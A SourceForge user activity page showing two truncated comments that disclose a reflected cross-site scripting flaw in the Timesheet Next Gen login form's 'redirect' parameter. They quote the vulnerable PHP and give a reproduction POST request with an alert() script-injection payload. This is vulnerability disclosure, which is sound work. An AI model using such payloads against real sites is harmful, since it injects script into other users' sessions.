User Activity

  • Posted a comment on discussion Open Discussion on Timesheet Next Gen

    To reproduce: POST /login.php HTTP/1.1 Host: localhost Content-Length: 108 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/login.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fi;q=0.7 Connection: close redirect="/><script>alert("XSS")</script><input style="disp...

  • Posted a comment on discussion Open Discussion on Timesheet Next Gen

    There's a cross-site scripting vulnerability in login form that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. Version: <=1.5.3 https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l54 $redirect = isset($_REQUEST["redirect"]) ? $_REQUEST["redirect"] : ""; ?> <html> <head> <title>Timesheet Login</title> <?php include ("header.inc"); ?> </head> <body onLoad="document.loginForm.username.focus();">...

View All

Personal Data

Username:
mivarri
Joined:
2019-02-17 12:32:08

Projects

  • No projects to display.

Personal Tools

MongoDB Logo MongoDB